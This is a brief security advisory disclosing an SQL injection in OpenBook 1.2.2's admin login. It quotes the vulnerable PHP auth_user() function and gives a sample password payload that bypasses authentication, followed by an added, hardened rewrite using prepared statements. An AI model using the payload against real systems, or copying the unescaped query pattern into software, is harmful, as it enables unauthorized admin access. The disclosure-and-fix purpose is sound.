SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: SQL injection
Product: OpenBook
Version: 1.2.2
Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerabilities
***************

Code:

function auth_user($userid, $password)
{
    global $HTTP_POST_VARS;
    global $admin_table;

    $userid=$HTTP_POST_VARS['userid'];
    $password=$HTTP_POST_VARS['password'];

    db_connect();

    // POST values are interpolated into the query without any escaping
    $query="SELECT userid "
          ."FROM $admin_table "
          ."WHERE userid='$userid' AND password=password('$password')";
    $result=mysql_query($query);

    if(!mysql_num_rows($result)) // no matches
    {
        return 0;
    }
    else // match found so return userid
    {
        $query_data=mysql_fetch_array($result);
        return $query_data['userid'];
    }
}// end auth_user()

The variables $userid and $password in admin.php are not checked before
being placed into the SQL query. This makes SQL injection possible, after
which any user can gain access to the admin panels.

Here is a simple example of substitution:

-------------------------------
User ID: admin
Password: no') or 1/*
-------------------------------

Bug Found
*********
------------------------------------------------
Search Vulnerabilities Team - www.svt.nukleon.us
------------------------------------------------
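
A hardened counterpart to the auth_user() function quoted in this advisory, as an added example that is not part of the advisory or of OpenBook's code. Assumptions: PDO with an in-memory SQLite database (pdo_sqlite extension) stands in for MySQL, the table is named "admin", passwords are stored with password_hash() rather than MySQL's password(), and the stored password is constructed sample data.

```php
<?php
// Added example: auth_user() rewritten with a prepared statement.
// Assumed, not from OpenBook: PDO/SQLite stand-in, table name "admin",
// password_hash() storage, constructed sample credentials.

function auth_user(PDO $db, string $userid, string $password)
{
    // The placeholder binds $userid as data; it is never parsed as SQL.
    $stmt = $db->prepare('SELECT userid, password FROM admin WHERE userid = ?');
    $stmt->execute([$userid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is verified in PHP, so it never reaches the query text.
    if ($row === false || !password_verify($password, $row['password'])) {
        return 0;              // no matches
    }
    return $row['userid'];     // match found so return userid
}

// Constructed fixture: one admin account in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (userid TEXT PRIMARY KEY, password TEXT NOT NULL)');
$db->prepare('INSERT INTO admin (userid, password) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct-horse', PASSWORD_DEFAULT)]);

// Constructed inputs: valid login, wrong password, and the advisory's sample.
$cases = [
    ['admin', 'correct-horse'],
    ['admin', 'wrong-password'],
    ['admin', "no') or 1/*"],
];

foreach ($cases as [$u, $p]) {
    $r = auth_user($db, $u, $p);
    printf("%-6s %-16s => %s\n", $u, $p, $r === 0 ? 'rejected' : "accepted as $r");
}
```

Only the first case is accepted; the advisory's sample password is treated as an ordinary string that fails verification.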